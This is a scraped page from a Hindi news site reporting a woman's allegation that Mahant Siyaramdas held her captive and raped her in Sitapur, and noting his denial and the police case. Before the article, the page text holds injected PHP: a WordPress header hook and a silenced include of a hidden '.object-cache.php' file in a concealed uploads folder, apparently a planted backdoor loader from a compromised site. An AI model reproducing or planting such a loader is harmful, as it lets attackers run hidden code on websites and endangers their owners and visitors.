add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); यूपी के सीतापुर में महंत सियारामदास पर बंधक बनाकर रेप का आरोप – SOCH INDIA
Menu

अपराध समाचार
यूपी के सीतापुर में महंत सियारामदास पर बंधक बनाकर रेप का आरोप

nobanner

उत्तर प्रदेश के सीतापुर में आश्रम और स्कूल चलाने वाले बाबा सियारामदास पर इस युवती ने 6 महीने तक बंधक बनाने और रेप करने का आरोप लगाया है. पीड़िता के मुताबिक नौकरी दिलाने के नाम पर उसके ही रिश्तेदारों ने बाबा की करीबी महिला रिंटू सिंह के हाथों 50 हजार रुपये में बेच दिया था.

रिंटू सिंह स्कूल की प्रबंधक है. पीड़ित का आरोप है कि रिंटू सिंह ने उसे बाराबंकी, फैजाबाद, लखनऊ और आगरा के आश्रम में भेजती थी जहां उसके साथ बलात्कार किया जाता और मोबाइल में वीडियो बनाकर ब्लैकमेल किया जाता था.

पीड़ित के मुताबिक वो जैसे-तैसे बाबा के कब्जे से भागने में कामयाब हो सकी. महंत सियारामदास सारे आरोपों को झूठा करार दे रहा है और लड़की को पहचानने तक से इनकार कर रहा है. पुलिस ने पीड़ित की शिकायत पर केस दर्ज लिया है और आगे जांच में जुट गई है.